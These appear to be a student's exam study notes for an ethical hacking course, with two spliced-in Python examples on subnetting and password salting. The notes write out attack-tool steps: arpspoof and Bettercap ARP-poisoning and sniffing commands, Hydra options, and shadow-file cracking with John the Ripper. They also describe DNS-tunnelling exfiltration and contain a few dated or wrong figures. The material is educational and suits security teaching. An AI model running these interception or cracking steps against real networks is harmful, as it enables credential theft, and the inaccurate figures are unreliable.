CSCI 369 – Ethical Hacking Exam

Contents
Lecture 1-1: Introduction to Ethical Hacking
Lecture 1-2: Information Gathering
Lecture 2-1: TCP/IP Basics and Capturing Traffic
Lecture 2-2: Scanning
Lecture 3-1: ARP and ARP Poisoning
Lecture 3-2: Protection against MITM, DNS Attacks and NAT
Lecture 4-1: Password Cracking and Password Security
Lecture 4-2: Vulnerability Scanning & Target Exploitation (1)
Lecture 5-1: Target Exploitation (2) and Social Engineering
Lecture 5-2: Web Penetration
Lecture 6-1: Wireless Network Penetration and Privacy Tools
Lecture 6-2: Privacy Tools (2) & Miscellaneous Topics

Lecture 1-1: Introduction to Ethical Hacking

Kinds of hackers
White Hat (Ethical Hackers)
• With the owner’s consent, they aim to identify the vulnerabilities in the current system.
• They abide by a code of ethics which states that they cause no harm.
Grey Hat
• They hack with good intentions but at times without permission.
Black Hat (Malicious Hackers)
• They lack ethics, violate laws, and break into computer systems with malicious intent.
• They might or might not be motivated by an agenda, but typically the information they gather is sold for a price.

Cyberlaw was introduced due to:
➢ The difficulty of the existing legal framework in keeping up with technological advances in cyberspace.
➢ The fact that more crimes take place within cyberspace.
➢ It touches on many elements such as:
  ➢ Contracts.
  ➢ Interactions between suppliers and consumers.
  ➢ Policies on handling of data and accessing corporate systems.
  ➢ Complying with government regulations and programs.

Controversies in Cyberlaw
• FISA (Foreign Intelligence Surveillance Act of 1978)
  ➢ It is a United States federal law which permits the government to conduct electronic surveillance on “agents of foreign powers” suspected of espionage or terrorism. (If one of the parties involved in the communication is a US citizen, the law can be applied.)
  ➢ Wiretapping could be performed with or without a court order to acquire foreign intelligence.

Categories of cybercrime law
Identity theft
• Where personal information is stolen and used, mainly for financial gain.
• E.g., opening a credit card/bank account, obtaining rental properties.
Theft of service
• Use of phone, Internet (Wi-Fi network intrusion) or movie streaming services without permission; it usually involves password cracking.
• E.g., sharing a Netflix account with friends can be considered theft and can be prosecuted in certain states of the US.
Transmitting of illegal materials
• Distribution of pirated (without permission/license) software, games, movies, or child pornography.
• E.g., Pirate Bay, Megaupload
Cyberextortion/Ransomware attacks
• Demanding money to prevent a threatened attack/leak of a company’s confidential information.
• E.g., fitness brand Garmin was a victim of a ransomware attack on 27 July 2020; their wearables, apps, websites, and call centers were offline for several days.
• Famous celebrity hack, September 2014: iCloud and Gmail accounts of celebrities were broken into, and private photos and videos of celebrities were leaked to the public.
Cryptojacking
• Unauthorized use of someone else’s device to mine cryptocurrency.
Dumpster Diving
DoS/DDoS
• Dumpster Diving – Gathering of information from discarded/unattended materials.
• DoS/DDoS – Overloading of a system’s resources so that it cannot provide the required services to legitimate users.
Cyberterrorism
Cyberstalking/Cyberbullying

Types of penetration testing
Black-Box
• Most closely resembles an outside attack. (External attack)
• Pen tester conducts the attack from a remote location.
• Pen tester is given extremely limited information about the target.
Grey-Box
• Pen tester will be given some limited knowledge of the target.
• E.g., what OS the target is using, etc.
White-Box
• Pen tester will be given full knowledge of the target.
• It simulates an “insider attack/internal test”.

Pen tester must obtain clear and unambiguous permission from the owners to perform a pen test. Preferably a written form of authorization rather than a verbal authorization, covering:
➢ Systems to be evaluated
➢ Perceived risks
➢ Timeframe
➢ Actions to be performed when a serious problem is found
➢ Deliverables

Risk Mitigation Plan (RMP)
➢ Purpose: to develop options and actions to enhance opportunities and reduce threats in an organization.
➢ Contents: it should clearly document all the actions that took place, including the results, interpretations, and recommendations.

CIA triad
➢ Confidentiality: keep information secret/private from those who are not authorized.
➢ Integrity: keep information in a format that retains its original purpose and meaning.
➢ Availability: keep information and resources available to those who are legitimate.
Anti-CIA triad
➢ Improper disclosure/Disclosure: accidental or malicious revealing of information.
➢ Unauthorized alteration/Destruction: accidental or malicious modification of information.
➢ Disruption: accidental or malicious disturbance of information or resources.

Lecture 1-2: Information Gathering
• Information gathering is a process of ethical hacking through which a pen tester locates information about a target, which will be useful for later steps of the attack.
Methods for intelligence gathering
Passive – Gathering of information without establishing contact between the attacker and the target. Tools such as theHarvester can be used to collect emails about targeted domains.
Active – Gathering of information which involves contact between the attacker and the target. Tools such as nmap can be used to run scans on target machines to see what ports are open on them and thus what applications are running on them.

Another example of passive intelligence gathering is Open Source Intelligence (OSINT) gathering:
• Gathering information from publicly available sources such as social media, phone number and email research, wireless network detection and packet analysis.
• Due to the prevalence of online activities, this may be all that is required to give the attacker everything they need to successfully profile an organization or an individual.

Domain Name System (DNS)
• It is the phonebook of the Internet.
• It resolves hostnames/domain names to IP addresses so that browsers can load the necessary Internet resources.
(Figure: DNS hierarchy placement, from top to bottom.)

How does DNS work?
1. User Web Browser – The user types a URL into their browser; if the browser can’t find the IP address in its own cache memory, it sends a query to the Local DNS Server (ISP).
2. Local DNS Server/DNS Resolver – It checks its own cache memory to find an IP address matching the URL entered into the browser. If it can’t find it, it sends a query to the Root Server.
3. Root Server – The Local DNS Server queries the Root Servers to get a list of IP addresses for the TLD Servers responsible for .com.
4. Top-Level Domain (TLD) Server – The Local DNS Server queries the TLD Servers to get the IP address of the Authoritative DNS Server for the URL entered.
5. Authoritative DNS Server – The Local DNS Server queries the Authoritative DNS Server to get the IP address of the URL entered.
6.
Back to user’s computer – The Local DNS Server tells the user’s computer the IP address of the URL entered, and the computer can now retrieve the URL’s webpage.

Gathering information about subdomains
1. https://searchdns.netcraft.com/
2. https://pentest-tools.com/information-gathering/find-subdomains-ofdomain
Gathering information about domains sharing the same IP address
➢ Reverse IP lookup – https://hackertarget.com/reverse-ip-lookup/

Gathering intelligence from websites
• People (personnel)
• Email addresses
• Physical addresses
• Job postings leaking information
• Product, project, and service information
• Electronic dumpster diving – finding websites that do not exist anymore (web.archive.org); on Kali Linux we can use “$ sudo wget -m <website name>” to download the website and view it offline, which allows the attacker to look for vulnerabilities.

Intelligence Gathering Tools
➢ nslookup – Gathering information about a domain
  ➢ A tool for querying the DNS to obtain domain name to IP address mappings, or other DNS records.
  ➢ It can send a DNS query directly to any type of DNS server (Root, TLD, Authoritative).
  ➢ By adding the -type option, one can specify the type of DNS record:
    o -type=A (IPv4) or AAAA (IPv6) – Stores the IP address for a name.
    o -type=CNAME – This is an alias record for another record.
    o -type=MX – This identifies the mail server for that domain.
    o -type=NS – This identifies the authoritative DNS servers for that DNS name.
    o -type=SOA – This provides the authoritative information about the domain (e-mail address of the domain admin, the domain serial number, etc.).
➢ whois – Gathering information about a domain
  ➢ A protocol for querying the owner of a domain name or IP network.
  ➢ Contains information about the owner, including email addresses, contact numbers, street addresses, etc.
  ➢ Command syntax: $ whois <ip address/website url>
➢ traceroute – Gathering information about network topology
  ➢ A tool that can help determine network topology, showing the path a packet takes as it travels from the source to its destination. More importantly, it gives information about the routers between the source and destination.
➢ theHarvester – Gathering information about email addresses and people
  ➢ A tool to collect email addresses, subdomains, employee names, etc.
  ➢ Command syntax: $ theHarvester -d <domain name> -b <search engine> -l <number of entries>

Lecture 2-1: TCP/IP Basics and Capturing Traffic

TCP/IP Stack
➢ It stands for Transmission Control Protocol/Internet Protocol.
➢ The TCP/IP stack is specifically designed as a model to offer a highly reliable, end-to-end byte stream over an unreliable internetwork.

TCP: Connection-oriented protocol
➢ The sender does not send any data to the destination until the destination node acknowledges that it is listening to the sender.
➢ TCP/IP utilizes a three-way handshake to establish a connection between a device and a server:
  o The sender sends a SYN packet to the receiver.
  o The receiver sends SYN-ACK to the sender.
  o The sender sends ACK to the receiver.
  o Both the device and server must synchronize and acknowledge packets before communication begins; then they can negotiate, separate and transfer TCP socket connections.

UDP: Connectionless protocol
➢ It does not need to verify whether the receiver is listening or ready to accept the packets, unlike TCP which has handshaking dialogues.
➢ Since UDP does not have any handshaking dialogues, there is no guarantee of delivery, ordering and/or duplicate protection.
➢ Unreliable but fast – Used in applications in which queries must be fast and only consist of a single request, such as DNS, SNMP and DHCP.
IP address classes
➢ Class A address – network.host.host.host
  o The first 8 bits (first octet) identify the network, and the remaining 24 bits identify the host within that network.
  o The 1st byte is reserved for the network address (network prefix) and the last 3 bytes are assigned to host computers.
  o Leading bit: 0
  o Range – Binary: 00000000.00000000.00000000.00000000 to 01111111.11111111.11111111.11111111; Decimal: 0.0.0.0 to 127.255.255.255
  o Number of addresses available for networks: 2^7 = 127
  o Number of addresses available for hosts: 2^24 = 16,777,216
➢ Class B address – network.network.host.host
  o The first 2 bytes are reserved for the network address and the last 2 bytes are assigned to host computers.
  o Leading bits: 10
  o Range – Binary: 10000000.00000000.00000000.00000000 to 10111111.11111111.11111111.11111111; Decimal: 128.0.0.0 to 191.255.255.255
  o Number of addresses available for networks: 2^(6+8) = 16,384
  o Number of addresses available for hosts: 2^16 = 65,536
➢ Class C address – network.network.network.host
  o The first 3 bytes are reserved for the network address and the last byte is assigned to host computers.
  o Leading bits: 110
  o Range – Binary: 11000000.00000000.00000000.00000000 to 11011111.11111111.11111111.11111111; Decimal: 192.0.0.0 to 223.255.255.255
  o Number of addresses available for networks: 2^(5+8+8) = 2,097,152
  o Number of addresses available for hosts: 2^8 = 256
➢ Class D for multicast
➢ Class E for R&D and study

Subnet mask – https://www.calculator.net/ip-subnet-calculator.html
➢ A bitmask that yields the network prefix (network address) when applied with a bitwise AND operation to any IP address in the network.
➢ Example – The network prefix of the IP address 192.168.54.3 with subnet mask 255.255.255.0 is 192.168.54.
➢ Subnet mask for:
  ▪ Class A – 255.0.0.0
  ▪ Class B – 255.255.0.0
  ▪ Class C – 255.255.255.0

IPv4 vs IPv6
                            IPv4                    IPv6
No. of bits in IP address   32                      128
Format                      Decimal                 Hexadecimal
Capable of addresses        2^32 (4.3 billion)      2^128 (“infinite” number)
How to ping                 ping xxx.xxx.xxx.xxx    ping6

Advantages of IPv6 over IPv4:
➢ IPv6 simplified the router’s task compared to IPv4.
➢ IPv6 is more compatible with mobile networks than IPv4.
➢ IPv6 allows for bigger payloads than what is allowed in IPv4.
➢ IPv6 is used by less than 1% of the networks, while IPv4 is still in use by the remaining 99%.

CIDR Notation
➢ It is the compact method for representing an IP address and its associated network prefix.
➢ It is constructed from an IP address, a slash (‘/’) and then a decimal number. The decimal number is the count of leading 1 bits in the subnet mask.
➢ Why is it needed? The classful network does not fully represent more fine-grained network prefixes:
  o Class A: /8
  o Class B: /16
  o Class C: /24

Capturing traffic using Wireshark
• It is a GUI software that captures packets in real time and displays them in human-readable format.
• An interface can be selected (such as eth0) to start capturing packets on that interface.
• By default, Wireshark runs in promiscuous mode. The user can see all the other packets on the network instead of only packets addressed to the user’s network adapter.
• Wireshark color coding: TCP traffic – purple; UDP traffic – light blue; errors – black.
• The user can also see the full TCP conversation between the client and the server by following the TCP stream.
• Wireshark can capture usernames and passwords entered into insecure websites.
• Users can capture packets in Wireshark and save them to a “pcap” file, then use the Python Scapy library to search for keywords such as “password”.
• Wireshark is also able to analyze connections based on secure application protocols such as SSL.

Lecture 2-2: Scanning
➢ Attackers scan to discover which machines in the target system are live, as they are unable to perform attacks if any of the machines are not available.
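The subnet-mask and CIDR arithmetic from the IP addressing section above, worked in Python as an added example that is not part of the lecture notes: the network prefix by bitwise AND, the prefix length from a mask, the class from the leading bits, and the host range of a CIDR block (the address list a ping sweep of that block would work through). Every address, mask and prefix in it is constructed.

```python
"""Added example (not from the lecture notes): subnet-mask and CIDR arithmetic.
All addresses, masks and prefixes used here are constructed for illustration."""
from ipaddress import IPv4Address
from typing import Iterator, Tuple

ALL_ONES = 0xFFFFFFFF


def to_int(dotted: str) -> int:
    """Dotted-decimal IPv4 string -> 32-bit integer (validates the octets)."""
    return int(IPv4Address(dotted))


def to_dotted(value: int) -> str:
    return str(IPv4Address(value))


def network_prefix(ip: str, mask: str) -> str:
    """Bitwise AND of the address with the subnet mask gives the network address."""
    return to_dotted(to_int(ip) & to_int(mask))


def prefix_length(mask: str) -> int:
    """CIDR prefix length = number of leading 1 bits in the mask.
    A mask whose 1 bits are not contiguous (e.g. 255.0.255.0) is rejected."""
    m = to_int(mask)
    ones = bin(m).count("1")
    if m != (ALL_ONES << (32 - ones)) & ALL_ONES:
        raise ValueError(f"non-contiguous subnet mask: {mask}")
    return ones


def mask_from_prefix(length: int) -> str:
    """Inverse of prefix_length: /24 -> 255.255.255.0."""
    if not 0 <= length <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    return to_dotted((ALL_ONES << (32 - length)) & ALL_ONES)


def address_class(ip: str) -> str:
    """Classful category from the leading bits of the first octet:
    0 -> A, 10 -> B, 110 -> C, 1110 -> D (multicast), 1111 -> E."""
    first_octet = to_int(ip) >> 24
    if first_octet >> 7 == 0b0:
        return "A"
    if first_octet >> 6 == 0b10:
        return "B"
    if first_octet >> 5 == 0b110:
        return "C"
    if first_octet >> 4 == 0b1110:
        return "D"
    return "E"


def cidr_block(cidr: str) -> Tuple[str, str, int]:
    """(network address, broadcast address, usable host count) for a.b.c.d/n.
    /31 and /32 blocks have no separate network/broadcast addresses, so every
    address in them counts as usable."""
    ip, length_str = cidr.split("/")
    length = int(length_str)
    net = to_int(ip) & to_int(mask_from_prefix(length))
    size = 1 << (32 - length)
    bcast = net + size - 1
    usable = size - 2 if size > 2 else size
    return to_dotted(net), to_dotted(bcast), usable


def host_addresses(cidr: str) -> Iterator[str]:
    """Every host address in the block, i.e. the target list a ping sweep (fping)
    of that block would work through."""
    net_s, bcast_s, usable = cidr_block(cidr)
    net, bcast = to_int(net_s), to_int(bcast_s)
    first, last = (net + 1, bcast - 1) if usable == bcast - net - 1 else (net, bcast)
    for value in range(first, last + 1):
        yield to_dotted(value)


if __name__ == "__main__":
    print(network_prefix("192.168.54.3", "255.255.255.0"))  # 192.168.54.0
    print(prefix_length("255.255.255.0"), address_class("192.168.54.3"))
    print(cidr_block("192.168.54.0/24"))
```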
➢ During the scan, the attacker obtains more specific and precise information that can lead to exploitation.

Scan types
Ping sweep
  Description: To find out live systems (which IP addresses have a system that is live).
  Base protocol: ICMP scanning. Every host that receives an ICMP echo request should respond; however, quite a few networks and hosts block ICMP echo requests to prevent scanning.
  Tools used: ping – targets one specific IP; fping – pings multiple IP addresses.
Port scanning
  Description: Targets a specific IP address and identifies the ports that are open and closed. (A common technique to discover weak points in a network.)
  Tools used: Nmap
Vulnerability scanning
  Description: To find weaknesses or problems in an environment and generate a report on its findings.

Port-Scanning Tools – Nmap
It has many features such as: port scanning, version detection, OS detection, network traceroute, multiple ping scanning and scripting functionality.
➢ Command syntax: nmap <option> -v <target IP address>
➢ If the port is closed, the server will send RST (reset/tear down the connection) back to the client.

Nmap scanning options:
-sT (TCP Scan)
➢ Full open scan (three-way handshake)
➢ Most reliable way of telling if the host’s port is open.
➢ It is “noisy” as it creates more traffic and involves multiple scanning attempts, which can be detected.
-sS (SYN Scan)
➢ Half-open scan (default option for Nmap)
➢ Most frequently used scanning method.
➢ Less likely to trigger the detection mechanism of the target (server).
-sX (Xmas Scan)
➢ It sends a packet with the PSH, FIN and URG flags set to create confusion; if the server does not respond, it means the port is open or filtered.
-sN (NULL Scan)
➢ It sends a packet with no flags set; if the server does not respond, it means the port is open or filtered.
-sF (FIN Scan)
➢ It sends a packet with the FIN flag set; if the server does not respond, it means the port is open or filtered.
-sA (ACK Scan)
➢ It sends a packet with the ACK flag set; if the server does not respond, it means filtering is present.
-sU (UDP scan)
➢ It is the only Nmap scanning method that identifies UDP ports.

Nmap port specification:
➢ Default option – The most common 1000 ports will be scanned in a random order.
➢ -p (port range) – Scan only the defined ports (can see which ports are open).
➢ -r – Do not randomize port numbers.
➢ -sV – Attempts to determine the version of the service running on the port (version number of the programs the target server is running).
➢ -O – Remote OS detection using TCP/IP stack fingerprinting.
➢ -F – Only scan the 100 most common ports (fast).
➢ --top-ports N – Scan the most common N ports.

Nmap 6 port states:
➢ open – The application is accepting TCP/UDP connections; result of a TCP or SYN scan.
➢ closed – There is no application accepting TCP/UDP connections; result of a TCP, SYN, Xmas, NULL or FIN scan.
➢ filtered – There is a packet filtering mechanism blocking the probe; result of an ACK scan.
➢ unfiltered – The port is accessible, however Nmap is unable to determine if the port is open or not; result of an ACK scan.
➢ open|filtered – The port is open or filtered, however Nmap is unable to determine which; result of a Xmas, NULL or FIN scan.
➢ closed|filtered – Uncommon.

Lecture 3-1: ARP and ARP Poisoning

ARP (Address Resolution Protocol)
➢ It is a network protocol used to discover the hardware (MAC) address of a host from an IP address.
➢ It is used on Ethernet LANs when hosts want to communicate with each other, since they need to know each other’s MAC address.
➢ It is a simple request-reply protocol:
  o ARP request messages are used to request the MAC address.
  o ARP reply messages are used to send the requested MAC address.
➢ ARP requests cannot be blocked by the host’s local firewall as ARP requests are not routed on a network.
(Figure with numbered steps 1–4 omitted.)

netdiscover
➢ It can be used to discover the clients connected to the current network interface.
➢ It shows information such as: IP address, MAC address and the hardware manufacturer of the clients’ network card.
➢ It runs in 2 modes:
  o Passive mode – It sniffs ARP requests on the network, but it does not generate any packets on the network.
  o Active mode – It finds nodes by sending ARP requests.

ARP Poisoning (based on MITM attack)
➢ A Man-In-The-Middle attack is an attack where the attacker secretly relays and possibly modifies the communication between two parties, making them believe they are directly communicating with each other; the attacker sits in the “middle” to intercept the messages between the two parties.
(Figure with numbered steps 1–6 omitted.)
➢ Essentially the attacker wants Host A to think that he is the gateway and wants the real gateway to think that he is Host A. (“Impersonation”/redirecting traffic)
➢ The attacker will be able to intercept every packet that passes between Host A and the real gateway.
➢ The attacker will then be able to read/modify/drop these packets in the traffic, which will allow the attacker to conduct more powerful attacks.

Arpspoof
➢ It is a tool to perform an ARP Poisoning attack.
1. On the target machine, run “arp -a” to check the MAC address of Kali Linux and the gateway.
2. On Kali, run “arpspoof -i <interface> -t <target IP> <gateway IP>”.
3. On Kali, run “arpspoof -i <interface> -t <gateway IP> <target IP>”.
4. On Kali, run “echo 1 > /proc/sys/net/ipv4/ip_forward”. This will enable IP forwarding to make packets go through the attacker’s device.
Notice the gateway’s MAC address changed to Kali’s MAC address. ARP Poisoning is successful.

Bettercap
➢ It is another method to perform an ARP poisoning attack on Kali Linux. It features a GUI and is more user friendly.
1. On Kali, run “set arp.spoof.fullduplex true”. This will let Kali attack both the targets and the gateway.
2. On Kali, run “set arp.spoof.targets <target IP>” and “arp.spoof on”.
3. Now, the target machine will think Kali is the gateway.
4. On Kali, run “net.sniff on”; Kali will now be able to capture sensitive information.
If the target visits an unsecured website and keys in their login credentials, Bettercap will be able to capture that information.
➢ We can also write scripts to better execute the commands in Bettercap; the file extension will be “.cap”.
➢ We can also perform SSL stripping, which downgrades an https website to http. This ensures https does not use TLS (SSL) to encrypt normal HTTP requests and responses, thus allowing the attacker to see everything the user sends in unencrypted form.

Prevention against ARP Poisoning
➢ It is difficult to prevent ARP poisoning itself, as it exploits the insecure way that ARP works. (Why ARP Poisoning works)
➢ Prevention methods such as using static ARP tables are not feasible as they do not scale well and have to be configured every time a new device is connected to the network.
➢ Detection methods:
  o Looking at the current ARP table (arp -a) – If the MAC address of the gateway changes, that means ARP Poisoning is underway.
  o Tools that monitor ARP automatically – If there is anything suspicious, they will send the user a notification.
  o Wireshark – It warns the user with the message “duplicate use of <IP address> detected”.

Lecture 3-2: Protection against MITM, DNS Attacks and NAT

End-to-end encryption can be an effective solution against eavesdropping using a MITM attack:
➢ End-to-end encryption successfully prevents the adversary from accessing the data in the middle.
➢ Even if the attacker managed to capture all the data transmitted between the server and the target, he is still unable to decrypt the data.
➢ The most popular and common end-to-end encryption is TLS/SSL encryption, which solves HTTP’s problem that requests and responses are sent in plaintext.

SSL/TLS Strip
➢ Since most websites use TLS/SSL encryption (https), it is almost impossible to catch usernames and passwords. This is where SSL stripping comes in; the idea is to downgrade an https site to http.
➢ By downgrading https to http, the attacker prevents SSL certificate errors while he communicates with the client.
How to prevent SSL Strip?
  o Users should do their due diligence in checking whether the website they are visiting is an https site (check the SSL certificate on the website before keying in any sensitive information).
  o HSTS (HTTP Strict Transport Security) – A policy that forces a web browser to only interact with websites using https. (The browser will not open a page unless the traffic from the website is https.)

Recap: Domain Name System (DNS)
➢ Phone book of the Internet; it translates domain names to IP addresses so that web browsers can load Internet resources. (All Internet-working applications require DNS to function.)
➢ Uses a hierarchical naming scheme: Root Server → Top-Level Domain Server → Authoritative Server.
➢ Traditional firewalls leave port 53 open for DNS queries; however, this is difficult to protect against DDoS attacks such as amplification and reflection, so it becomes a primary target to slow down or disable the target network.
Normally, if a DNS server does not know a requested translation, it proceeds to ask another DNS server, and this process continues recursively. To increase performance, a DNS server stores these translations in its cache for a certain amount of time, so that if it receives another request for the same translation, it can reply without needing to ask other DNS servers.

DNS Attacks
1. DNS Cache Poisoning (DNS Spoofing)
• The attacker breaks into a local DNS server and modifies the DNS cache so that it returns an incorrect IP address, redirecting traffic to another computer.
• This means the DNS cache has been poisoned, since the cache gives the victim a false translation of hostnames.
• Example – This attack can redirect users from a website to one that the attacker owns.
  o The attacker spoofs the IP address/DNS entries for a target website on a given DNS server and replaces them with the IP address of a server under their control.
  o Usually, the server under the attacker’s control has been infected with malware.
  o This technique can also be used for phishing attacks, where a fake version of a genuine website is created to collect personal details (bank and credit card details).
2. DNS Spoofing with MITM
• The MITM attacker captures a DNS response from the DNS server and replaces it with a modified one, so that the DNS response forces the victim to visit the attacker’s server.
• (Figure: ARP Poisoning – a combination of DNS spoofing + MITM.)
3. Domain Hijacking
• The attacker gains access to a domain registration service’s server (such as GoDaddy.com). (GoDaddy.com offers free whois privacy, which replaces the user’s information in the WHOIS with the information of a forwarding service.)
• It is difficult to attack those servers, but if it happens, there will be severe consequences. The attacker changes the IP address of a target website to an IP of the attacker’s choice, and all the other DNS servers are updated with the new information.
4. DNS Tunnelling
• The attacker’s malware on the victim’s machine wants to transfer data from it to the attacker’s server. (If the attacker uses File Transfer Protocol (FTP), it will be detected by the victim’s firewall.)
• The attacker acquires some domain such as attacker.com and runs a local DNS server.
• The malware on the victim’s machine makes DNS queries of the form <data>.attacker.com, where <data> is the data the attacker wants to exfiltrate.
• If the query reaches the attacker’s DNS server, the DNS response is sent to the victim’s machine. Since the DNS query goes through port 53, it looks legitimate, enabling the attacker’s malware to bypass the firewall.
5. DNS flood attack (DDoS attack related)
A form of DDoS attack.
The attacker targets one or more DNS servers belonging to a given zone, attempting to impede resolution of resource records of that zone and its sub-zones. The objective of the attack is to exhaust server-side assets with a flood of UDP requests, generated by scripts running on several compromised botnet machines.
6. DNS amplification attack
• The attacker obtains a victim’s IP address.
• The attacker identifies a website with a large number of DNS records.
• The attacker crafts fake DNS queries for the host with a large amount of DNS data, with the victim’s IP as the receiver, so that DNS responses with the large number of DNS records are returned to the victim.
• The victim’s machine cannot handle the large amount of DNS responses → the machine is down.

Lecture 4-1: Password Cracking and Password Security

Password cracking
➢ It is an effective way to gain access to a system.
➢ Many institutions urge and educate their members to select strong passwords, but not everyone follows the rule; weak passwords are almost always used.

Password cracking methods:
1. Brute-force attack
• Every possible combination of characters is attempted until the correct one is discovered.
• Although this attack has the potential to be successful eventually, many modern systems employ techniques such as “account lockouts” or “bad login counts” to prevent this attack. (Such as the iPhone’s passcode: after too many failed login attempts, the phone will not allow the user to unlock it for a certain amount of time.)
2. Dictionary
• Uses a list of words which can possibly be used as passwords.
• Password cracking software usually has pre-loaded lists of words or allows users to load their own list (text file).
• The words on the list can accelerate the cracking process and reduce the time taken.
• These lists are all over the Internet and can be downloaded for free.
3. Hybrid method
• This attack uses the dictionary attack as a basis but adopts some techniques of brute-force attacks as part of the process.
(It can attempt some words in the dictionary but add numbers or special characters in a brute-force way.)

Password cracking tools
1. Hydra (brute force)
• It is an online brute-force password attack tool.
• It makes use of numerous protocols including ftp, http, ssh, smtp, POP3, mysql, etc.
• It supports multiple connections (i.e., parallel attacks).
• Command syntax: hydra [options] <target IP> <protocol>
  o -t (the number of connections in parallel per target; default is 16)
  o -l (the login ID of the target)
  o -P (load several passwords saved in a file)
  o -v (verbose)
  o -V (shows every password being tried)
2. John the Ripper (hybrid method in password cracking)
• Unlike Hydra, it is an offline attack that finds the target’s password.
• It usually uses a password list, but it is capable of performing a brute-force attack.
• The attack consists of 2 steps:
  o Combine /etc/passwd (stores the list of registered users in the system) and /etc/shadow (stores the hashes of the passwords) – this process is called unshadowing.
  o Perform a dictionary attack against the unshadowed file using a word list to find a password.

Rainbow table
➢ It is a table of reversed hashes used to crack password hashes.
➢ It greatly speeds up many types of password cracking attacks, often taking minutes to crack where other methods (such as dictionary or brute-force attacks) may take much longer.
➢ It is a well-known pre-computed table for reversing hashes. A table look-up is much faster than computing hash values one by one (this technique is called a time/memory trade-off).
➢ The basic idea is to search for p such that h = H(p) using a huge number of precomputed (p, h) pairs.

Salt for password hashing
➢ A cryptographic salt is made up of random bits added to each password instance before hashing.
➢ Salt creates unique password inputs even when two users choose the same password.
➢ It helps mitigate hash table attacks by forcing attackers to re-compute the hashes for each salt.
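The rainbow-table and salt material above, worked as an added Python example that is not part of the lecture notes: a tiny precomputed digest table finds an unsalted hash at once, a per-user random salt (stored with PBKDF2-HMAC-SHA256 here, an assumption of this example rather than something the notes prescribe) makes that table useless, and the caveat that salting still leaves a weak password open to a dictionary attack that recomputes per salt. The word list and passwords are constructed.

```python
"""Added example (not from the lecture notes): why salting defeats a precomputed
(rainbow-style) hash table, and what it does not defeat. The word list and
passwords are constructed; the lookup table stores hash -> password pairs directly,
whereas a real rainbow table stores chains, but the attacker's lookup is the same."""
import hashlib
import hmac
import os
from typing import Dict, Optional

# Constructed word list of the kind the password guidelines warn against.
WORDLIST = ["password", "letmein", "qwerty123", "mustang", "john1234", "p@ssword"]
ITERATIONS = 100_000  # PBKDF2 work factor; an assumption, not a value from the notes


def unsalted_hash(password: str) -> str:
    """Plain SHA-256 of the password: the same password always gives the same digest."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(words) -> Dict[str, str]:
    """Precompute digest -> password once (the time/memory trade-off): paid for up
    front, then reusable against every unsalted hash ever captured."""
    return {unsalted_hash(w): w for w in words}


def crack_unsalted(digest: str, table: Dict[str, str]) -> Optional[str]:
    return table.get(digest)


def salted_hash(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256: the salt widens the hash input, the iterations slow each guess."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def create_record(password: str) -> Dict[str, bytes]:
    """What the server stores: a fresh random salt per user plus the salted hash."""
    salt = os.urandom(16)
    return {"salt": salt, "hash": salted_hash(password, salt)}


def verify(password: str, record: Dict[str, bytes]) -> bool:
    return hmac.compare_digest(salted_hash(password, record["salt"]), record["hash"])


def crack_salted_with_table(record: Dict[str, bytes], table: Dict[str, str]) -> Optional[str]:
    """The precomputed table never contains this digest: it was built without the salt."""
    return table.get(record["hash"].hex())


def dictionary_attack_salted(record: Dict[str, bytes], words) -> Optional[str]:
    """Caveat: salt does not stop a per-record dictionary attack on a weak password.
    It only removes the reusable table, forcing the attacker to redo the hashing
    for every salt (and ITERATIONS makes each of those guesses expensive)."""
    for w in words:
        if verify(w, record):
            return w
    return None


def demo() -> Dict[str, object]:
    table = build_lookup_table(WORDLIST)
    alice = create_record("qwerty123")
    bob = create_record("qwerty123")  # same password, different salt
    return {
        "unsalted_cracked": crack_unsalted(unsalted_hash("qwerty123"), table),
        "same_password_different_salted_hash": alice["hash"] != bob["hash"],
        "salted_cracked_with_table": crack_salted_with_table(alice, table),
        "salted_cracked_by_dictionary": dictionary_attack_salted(alice, WORDLIST),
        "alice_verifies": verify("qwerty123", alice),
        "wrong_password_rejected": verify("letmein", alice),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```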
➢ Benefits of using “salt” for password hashing:
  o Since salt creates unique password inputs, it reduces the possibility of collision.
  o It enlarges the input space of the hash function, so the size of the rainbow table would have to be larger, making a rainbow table attack impossible.

Password entropy H
➢ It is the measure of the strength of a password in bits.
➢ Formula:
  o H = L · log2 N (where L is the length of the string/password and N is the number of possible symbols)
  o It can be easily derived that L = H / log2 N.
➢ The minimum number of bits of entropy needed for a password depends on the threat model for the given application:
  o If online attacks are expected – 20-bit entropy is needed.
  o Important cryptographic keys to be secure for a long period of time – 96-bit entropy is needed.
  o Where does this estimation come from? n-bit entropy means the attacker has to find a random (uniform) n-bit key.

Guidelines for strong passwords
➢ Should:
  o Minimum password length of 8 or more characters if permitted.
  o Passwords should include lowercase and uppercase alphabetic characters, numbers and symbols if permitted.
  o Generate passwords randomly where feasible.
  o Write down a password on paper and store it (argumentative).
  o Password manager – to generate and retrieve complex passwords in an encrypted database.
➢ Avoid:
  o The same passwords across multiple accounts.
  o Repetition of characters, keyboard patterns, dictionary words, letter or number sequences – qwerty123
  o Public information that can be found online: birthdays, favorite sports teams, telephone numbers, usernames, relatives’ or pets’ names, romantic links, or biographical information (addresses/birthplace).
  o Using default passwords supplied by the system vendor, as lists of default passwords are widely available on the Internet.
  o Using dictionary words with numbers appended, or plain dictionary words: john1234, mustang
  o Words with simple obfuscation: p@ssword, @dm1n

Lecture 4-2: Vulnerability Scanning & Target Exploitation (1)
Vulnerability Scanning
➢ Concept – A process of identifying and analyzing the critical security flaws in the target system.
➢ Purpose – It is an automated, high-level test that looks for potential security vulnerabilities on the target system.
➢ Benefits – It can provide valuable information about the security posture of an organization's infrastructure and its technical and management policies.
Types of vulnerabilities:
1. Design
• Weaknesses in the software specifications. (Worst type)
• To fix these, changes must be introduced into the security requirements. However, the subsequent changes to the design and implementation can take considerable time and effort.
2. Implementation
• Technical security glitches found in the code of the system.
3. Local
• The attacker requires local access in order to exploit the vulnerability; this applies where the attacker already has the ability to execute code with limited permissions and wishes to enhance their privileges to gain unrestricted access (privilege escalation).
4. Remote
• The attacker has no prior access to the system but is able to trigger the execution of a piece of code over the network; this type allows an attacker to gain access to the system without having to deal with physical or local contacts.
5. Operational
• Improper configuration and deployment of a system in a particular environment.
